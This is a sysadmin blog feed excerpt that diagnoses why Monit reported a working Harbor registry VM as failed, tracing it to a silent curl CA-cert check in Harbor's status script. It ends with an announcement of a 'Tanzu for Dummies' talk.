<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1437.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1631" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1437.jpg?resize=335%2C284&#038;ssl=1" alt="" width="335" height="284" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1437.jpg?w=335&amp;ssl=1 335w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1437.jpg?resize=300%2C254&amp;ssl=1 300w" sizes="auto, (max-width: 335px) 100vw, 335px" /></a><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1438.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1632" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1438.jpg?resize=257%2C324&#038;ssl=1" alt="" width="257" height="324" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1438.jpg?w=362&amp;ssl=1 362w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1438.jpg?resize=238%2C300&amp;ssl=1 238w" sizes="auto, (max-width: 257px) 100vw, 257px" /></a></p>
<p>Opsman told us that the Harbor app itself was not starting. And we know it's actually using Monit to start, stop and monitor Harbor, and that it uses a set of scripts to do this.</p>
<p>The monit log can be found here: /var/vcap/monit/monit.log</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1635" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?resize=640%2C166&#038;ssl=1" alt="" width="640" height="166" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?w=1121&amp;ssl=1 1121w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?resize=300%2C78&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?resize=1024%2C265&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1328.jpg?resize=768%2C199&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>As I said, Harbor consists of a set of running Docker containers. If you wish to view these directly, you can actually use Docker on the VM.</p>
<p>SSH into the VM:</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1633" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=640%2C260&#038;ssl=1" alt="" width="640" height="260" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?w=2113&amp;ssl=1 2113w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=300%2C122&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=1024%2C416&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=768%2C312&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=1536%2C624&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?resize=2048%2C833&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1439.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>We need to run as root, and we need to make sure the Docker client can find the local Docker daemon.</p>
<pre>sudo su -<br />alias docker='/var/vcap/packages/docker/bin/docker -H unix:///var/vcap/sys/run/docker/dockerd.sock'</pre>
<p>Now we can simply run a 'docker ps' and see our containers.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1634" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=640%2C130&#038;ssl=1" alt="" width="640" height="130" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?w=2516&amp;ssl=1 2516w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=300%2C61&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=1024%2C208&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=768%2C156&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=1536%2C311&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?resize=2048%2C415&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1440.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>Now the cool thing is, you can simply kill all these processes if you want, and Monit will restart them. That can be very useful when testing things.</p>
<p>Let's have a look at the Monit configuration for Harbor:</p>
<pre>monit -v status</pre>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1640" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=640%2C172&#038;ssl=1" alt="" width="640" height="172" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?w=2316&amp;ssl=1 2316w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=300%2C80&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=1024%2C275&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=768%2C206&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=1536%2C412&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?resize=2048%2C549&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1441.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>Monit is using a specific script to start and stop Harbor: /var/vcap/jobs/docker/bin/ctl<br />If it meets the failure condition, it will use the same script to try to restart it.</p>
<p>The output of the ctl script is saved to ctl.stdout.log<br />In that file, we can see that the Harbor startup is timing out, at least according to the script.</p>
<pre>[Mon Feb 15 15:30:43 UTC 2021] Harbor service is not ready. Waiting for 5 seconds then check again.<br />[Mon Feb 15 15:30:48 UTC 2021] Harbor service is not ready. Waiting for 5 seconds then check again.<br />[Mon Feb 15 15:30:53 UTC 2021] Error: Harbor Service failed to start in 180 seconds.<br /><br /></pre>
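<p>I have not reproduced the real ctl script here, but log lines like these are typical of a simple poll-until-ready loop. Purely as an illustration of that pattern (the function name 'wait_until_ready' and its arguments are made up, and the actual readiness check the Harbor script uses is not shown), it could look something like this:</p>

```shell
# Run the given readiness command every $2 seconds until it succeeds or $1
# seconds have passed. Returns 0 as soon as the command succeeds, 1 on
# timeout. Everything after the first two arguments is the command to run.
wait_until_ready() {
    timeout="$1"
    interval="$2"
    shift 2
    elapsed=0
    while [ "$elapsed" -lt "$timeout" ]; do
        if "$@"; then
            return 0
        fi
        echo "Service is not ready. Waiting for $interval seconds then check again."
        sleep "$interval"
        elapsed=$((elapsed + interval))
    done
    echo "Error: service failed to start in $timeout seconds."
    return 1
}
```

<p>The point is that with a loop like this, the verdict depends entirely on the readiness command. The service can be up and running while the check keeps failing for some other reason, and you still end up with a timeout.</p>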
<p>Now the odd thing here was that when I checked 'docker ps', all the containers were actually running. And in fact, I could even reach the Harbor web UI without any problem.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1650" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?resize=640%2C469&#038;ssl=1" alt="" width="640" height="469" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?w=1142&amp;ssl=1 1142w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?resize=300%2C220&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?resize=1024%2C751&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1445.jpg?resize=768%2C564&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a><br />So Harbor was actually working. Why then was the ctl script concluding that the startup had failed?  What was it tripping over?</p>
<p>Harbor is actually coming up normally every time. It's Monit that is confused.</p>
<p>Monit is set to check the existence of the file ‘/var/vcap/sys/run/harbor/harbor.pid’</p>
<p>However, for whatever reason, when I checked, this file did not exist. So Monit keeps thinking Harbor failed to start, and tries to restart the whole container set.</p>
<p>This actually keeps failing: as all containers are already running, the command '/var/vcap/jobs/loggr-system-metrics-agent/bin/ctl start' doesn’t seem to actually do anything in this case. <br /> So Monit ends up in a loop, and BOSH (through Monit) reports the VM as being in a ‘failing’ state. (This is why the deployment ‘fails’, even though it actually didn’t.)</p>
<p>So what is in the directory ‘/var/vcap/sys/run/harbor/’ ?</p>
<p>harbor.tmp.pid, not harbor.pid, as monit is expecting.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1643" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?resize=640%2C82&#038;ssl=1" alt="" width="640" height="82" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?w=1070&amp;ssl=1 1070w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?resize=300%2C38&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?resize=1024%2C131&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1330.jpg?resize=768%2C98&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
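<p>If you want to do the same kind of pid-file check by hand, something like the following works. It is only a rough approximation of a pid-file based check, not Monit's own logic, and the function name 'check_pidfile' is made up for illustration:</p>

```shell
# Report whether a pid file exists and whether the PID stored in it belongs
# to a process that is currently running.
# Returns 0 when running, 1 when the file is missing, 2 when the PID is stale.
check_pidfile() {
    pidfile="$1"
    if [ ! -f "$pidfile" ]; then
        echo "missing: $pidfile"
        return 1
    fi
    pid=$(cat "$pidfile")
    # kill -0 sends no signal; it only tests whether the process exists.
    if kill -0 "$pid" 2>/dev/null; then
        echo "running: pid $pid"
    else
        echo "stale: pid $pid is not running"
        return 2
    fi
}
```

<p>In this case, 'check_pidfile /var/vcap/sys/run/harbor/harbor.pid' would have reported the file as missing, even though the containers were up.</p>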
<p>Another thing caught my attention: the cron.log file was filling up with these mysterious Python errors:</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1642" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?resize=640%2C140&#038;ssl=1" alt="" width="640" height="140" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?w=1444&amp;ssl=1 1444w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?resize=300%2C65&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?resize=1024%2C223&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?resize=768%2C168&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1442.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<pre>curl -s --cacert /var/vcap/jobs/harbor/config/ca.crt https://&lt;harbor FQDN&gt;/api/v2.0/systeminfo<br />Traceback (most recent call last):<br />File "&lt;string&gt;", line 1, in &lt;module&gt;<br />File "/var/vcap/packages/python/python2.7/lib/python2.7/json/__init__.py", line 291, in load<br />**kw)<br />File "/var/vcap/packages/python/python2.7/lib/python2.7/json/__init__.py", line 339, in loads<br />return _default_decoder.decode(s)<br />File "/var/vcap/packages/python/python2.7/lib/python2.7/json/decoder.py", line 364, in decode<br />obj, end = self.raw_decode(s, idx=_w(s, 0).end())<br />File "/var/vcap/packages/python/python2.7/lib/python2.7/json/decoder.py", line 382, in raw_decode<br />raise ValueError("No JSON object could be decoded")<br />ValueError: No JSON object could be decoded</pre>
<p>This output in cron.log was a bit confusing. We can see it running a curl command using the CA cert, but then it spits out a bunch of Python errors. Are the two related? Where is this coming from?</p>
<p>To understand what is going on, I needed to dig into the scripts.</p>
<p>As it turns out, the ctl script uses a different script altogether to do a health check on Harbor.</p>
<p>Ctl contains a function called ‘waitForHarbor’.<br />This merely calls ‘/bin/status_check’ and waits up to 180 seconds for it to complete.</p>
<p>And it is the output of this ‘/bin/status_check’ script that is being logged to cron.log.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1638" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?resize=640%2C284&#038;ssl=1" alt="" width="640" height="284" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?w=1029&amp;ssl=1 1029w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?resize=300%2C133&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?resize=1024%2C455&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1331.jpg?resize=768%2C341&amp;ssl=1 768w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
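<p>For readers who prefer code to screenshots, here is the general wait-with-timeout pattern that ‘waitForHarbor’ appears to follow. This is not the bash from the ctl script, only an illustrative Python 3 sketch. It assumes the check is polled repeatedly (the real script may wait differently), and the name wait_for, the 5-second interval and the injectable sleep and clock parameters are my own assumptions. Only the 180 seconds comes from the script.</p>

```python
import time


def wait_for(check, timeout=180, interval=5, sleep=time.sleep, clock=time.monotonic):
    """Poll check() until it returns True or until timeout seconds have passed."""
    deadline = clock() + timeout
    while True:
        if check():
            return True   # health check passed
        if clock() >= deadline:
            return False  # gave up: the caller treats this as a failed start
        sleep(interval)
```

<p>The point to take away is that the caller only ever sees "passed" or "timed out". If the check fails for a reason that has nothing to do with Harbor's health, it looks exactly the same as Harbor never coming up.</p>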
<p>&nbsp;</p>
<p>The ctl script is also responsible for maintaining the harbor.pid file. And this file is the health indicator that monit is actually triggering on.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1443.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1644" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1443.jpg?resize=595%2C397&#038;ssl=1" alt="" width="595" height="397" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1443.jpg?w=880&amp;ssl=1 880w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1443.jpg?resize=300%2C200&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1443.jpg?resize=768%2C512&amp;ssl=1 768w" sizes="auto, (max-width: 595px) 100vw, 595px" /></a><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone  wp-image-1645" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?resize=640%2C240&#038;ssl=1" alt="" width="640" height="240" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?w=1715&amp;ssl=1 1715w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?resize=300%2C112&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?resize=1024%2C384&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?resize=768%2C288&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?resize=1536%2C576&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1444.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>So that explains the behavior we are seeing. But why is it not passing 'waitForHarbor', aka the ‘/bin/status_check’ script?</p>
<p>When we look at the ‘/bin/status_check’ script, it contains a bunch of health checks.</p>
<p>The source of the file can actually be found here, if you want to see for yourself: <a href="https://github.com/vmware/harbor-boshrelease/blob/master/jobs/harbor/templates/bin/status_check.erb.sh">https://github.com/vmware/harbor-boshrelease/blob/master/jobs/harbor/templates/bin/status_check.erb.sh</a></p>
<p>This section immediately caught my eye:</p>
<p>&nbsp;</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1637" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?resize=640%2C201&#038;ssl=1" alt="" width="640" height="201" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?w=1673&amp;ssl=1 1673w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?resize=300%2C94&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?resize=1024%2C321&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?resize=768%2C241&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?resize=1536%2C482&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1333.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>You can actually run the entire script yourself, and then it becomes obvious where those Python errors were coming from:</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1647" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?resize=640%2C156&#038;ssl=1" alt="" width="640" height="156" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?w=1488&amp;ssl=1 1488w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?resize=300%2C73&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?resize=1024%2C250&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?resize=768%2C187&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1332-1.jpg?w=1280&amp;ssl=1 1280w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>So what is it doing here?</p>
<p>curl --cacert verifies the certificate presented by the URL you specify against the CA cert you give it. <br /><br />If verification fails, it will produce the text below.</p>
<p><a href="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?ssl=1"><img data-recalc-dims="1" loading="lazy" decoding="async" class="alignnone size-full wp-image-1646" src="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=640%2C102&#038;ssl=1" alt="" width="640" height="102" srcset="https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?w=2384&amp;ssl=1 2384w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=300%2C48&amp;ssl=1 300w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=1024%2C164&amp;ssl=1 1024w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=768%2C123&amp;ssl=1 768w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=1536%2C245&amp;ssl=1 1536w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?resize=2048%2C327&amp;ssl=1 2048w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?w=1280&amp;ssl=1 1280w, https://i0.wp.com/thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1334-1.jpg?w=1920&amp;ssl=1 1920w" sizes="auto, (max-width: 640px) 100vw, 640px" /></a></p>
<p>&nbsp;</p>
<p>However, in the check script, it's set to curl -s for silent. In this case, it will fail silently: curl won't produce any output at all.</p>
<pre>url=`${curl_command} ${protocol}://${harbor_url}/api/v2.0/systeminfo | python -c "import sys, json; print json.load(sys.stdin)['registry_url']"`</pre>
<p>But it's still trying to pipe the result to Python to pull a field out of the JSON output.</p>
<p>If curl doesn't fail, and the CA cert validates against the URL, then the Python JSON filter will simply return the registry URL from the response.</p>
<p>And this is where it fails. This section of the script contains no failure handling for the case where the CA cert that you set in the config doesn't actually validate against the cert used by Harbor itself. And this was the case for me: I had set the wrong CA cert (the root CA, instead of the intermediate, issuing CA).</p>
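<p>To make the failure mode concrete: when curl -s fails silently, the Python side is handed an empty string, and decoding that as JSON raises the ValueError we saw in cron.log. The sketch below shows one way that case could be caught and reported clearly. It is not the fix used in the Harbor BOSH release, it is written for Python 3 (the original one-liner is Python 2), and the function name extract_registry_url and the hostname harbor.example.com are made up for the example.</p>

```python
import json


def extract_registry_url(raw):
    """Return (registry_url, None) on success, or (None, reason) on failure."""
    if not raw.strip():
        # This is what the pipe receives when curl -s fails without output.
        return None, "empty response (curl -s may have failed silently, e.g. on a CA mismatch)"
    try:
        data = json.loads(raw)
    except ValueError as err:  # json.JSONDecodeError subclasses ValueError
        return None, "response is not JSON: %s" % err
    if not isinstance(data, dict) or "registry_url" not in data:
        return None, "no registry_url field in response"
    return data["registry_url"], None


print(extract_registry_url(""))
print(extract_registry_url('{"registry_url": "harbor.example.com"}'))
```

<p>With a message like the first one in the log, the wrong CA cert would have been a lot easier to spot than a bare Python traceback.</p>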
<p>So this was the root cause of monit failing the VM. It was not getting past this part of the check script. But it's not really obvious from the logs, not even from cron.log, what exactly is going wrong! <br /><br />The irony here is that Harbor actually was working fine. In fact, I have not been able to find any place where, or any reason why, Harbor itself actually requires the CA cert <em>at all</em>! It's only the check script that requires it, and that seems to be the only reason you have to provide the CA cert in the Opsman Tile config!</p>






]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1615</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<image>https://thefluffyadmin.net/wp-content/uploads/2021/02/SNAG-1434-1.jpg</image><post-id xmlns="com-wordpress:feed-additions:1">1615</post-id>	</item>
		<item>
		<title>Presentation &#8220;Tanzu for Dummies&#8221; &#8211; 29th Jan 2021</title>
		<link>https://thefluffyadmin.net/?p=1608</link>
					<comments>https://thefluffyadmin.net/?p=1608#respond</comments>
		
		<dc:creator><![CDATA[Thefluffyadmin]]></dc:creator>
		<pubDate>Thu, 21 Jan 2021 17:08:22 +0000</pubDate>
				<category><![CDATA[Career, Training and Personal Development]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[vexpert]]></category>
		<category><![CDATA[vmware]]></category>
		<category><![CDATA[ITQ]]></category>
		<category><![CDATA[Tanzu]]></category>
		<category><![CDATA[tkg]]></category>
		<category><![CDATA[tkgm]]></category>
		<category><![CDATA[tkgs]]></category>
		<guid isPermaLink="false">https://thefluffyadmin.net/?p=1608</guid>

					<description><![CDATA[I will be doing a Tanzu Session on the 29th. This is my own effort to help explain the VMware Tanzu portfolio to our customers, and anyone else who might be interested! "Tanzu for Dummies" https://itq.eu/presentation-tanzu-for-dummies/ &#160; Modern software development is increasingly moving toward so-called cloud-native architectures. And to run these 'modern-apps', you will likely <br><a class="read-more-button" href="https://thefluffyadmin.net/?p=1608">Read More &#187;</a>]]></description>
										<content:encoded><![CDATA[<p class="p-rich_text_section">I will be doing a Tanzu Session on the 29th. This is my own effort to help explain the VMware Tanzu portfolio to our customers, and anyone else who might be interested!</p>
<p>"Tanzu for Dummies"<br />
<a class="c-link" href="https://itq.eu/presentation-tanzu-for-dummies/" target="_blank" rel="noopener noreferrer" data-stringify-link="https://itq.eu/presentation-tanzu-for-dummies/" data-sk="tooltip_parent">https://itq.eu/presentation-tanzu-for-dummies/</a></p>
<p>&nbsp;</p>
<blockquote>
<p class="c-mrkdwn__pre" data-stringify-type="pre">Modern software development is increasingly moving toward so-called cloud-native architectures. And to run these 'modern-apps', you will likely need containers, a little something called 'Kubernetes', and the infrastructure and integrated tools surrounding it, to bring your application to production.</p>
<p>To answer this need, VMware has introduced Tanzu. But what is VMware Tanzu? Is it a product? Is it a platform? Is it just Kubernetes, or is it more?</p>
<p>In this 'Tanzu for Dummies' session, I will take you on a trip through the VMware Tanzu portfolio and give you ITQ's take on it all!</p>
<p>We will pierce through the branding and acronyms, zoom in on the different Kubernetes flavors and editions that VMware currently has, and look at some of the products and technologies that surround them. I will talk about what these technologies do, where they came from, how VMware is positioning them and how they fit into the greater picture of the Tanzu portfolio. After this session you will leave with a better understanding of how VMware plans to answer the modern-app challenge with Tanzu, and how you can make your own modern applications thrive in the cloud-native world.</p></blockquote>
<p>&nbsp;</p>
<blockquote class="twitter-tweet" data-width="550" data-dnt="true">
<p lang="en" dir="ltr">What is VMware Tanzu? Is it just Kubernetes, or is it more?</p>
<p>In this ‘Tanzu for Dummies’ session, <a href="https://twitter.com/thefluffysysop?ref_src=twsrc%5Etfw">@thefluffysysop</a> will take you on a trip through the VMware Tanzu portfolio and give you ITQ’s take on it all!<a href="https://t.co/EG4InmHXPr">https://t.co/EG4InmHXPr</a><a href="https://twitter.com/hashtag/kubernetes?src=hash&amp;ref_src=twsrc%5Etfw">#kubernetes</a> <a href="https://twitter.com/hashtag/tanzu?src=hash&amp;ref_src=twsrc%5Etfw">#tanzu</a> <a href="https://twitter.com/hashtag/vmware?src=hash&amp;ref_src=twsrc%5Etfw">#vmware</a> <a href="https://twitter.com/hashtag/cloudnative?src=hash&amp;ref_src=twsrc%5Etfw">#cloudnative</a> <a href="https://t.co/73FfmbxsZk">pic.twitter.com/73FfmbxsZk</a></p>
<p>&mdash; ITQ (@ITQ) <a href="https://twitter.com/ITQ/status/1352214882943455233?ref_src=twsrc%5Etfw">January 21, 2021</a></p></blockquote>
<p><script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p>
]]></content:encoded>
					
					<wfw:commentRss>https://thefluffyadmin.net/?feed=rss2&#038;p=1608</wfw:commentRss>
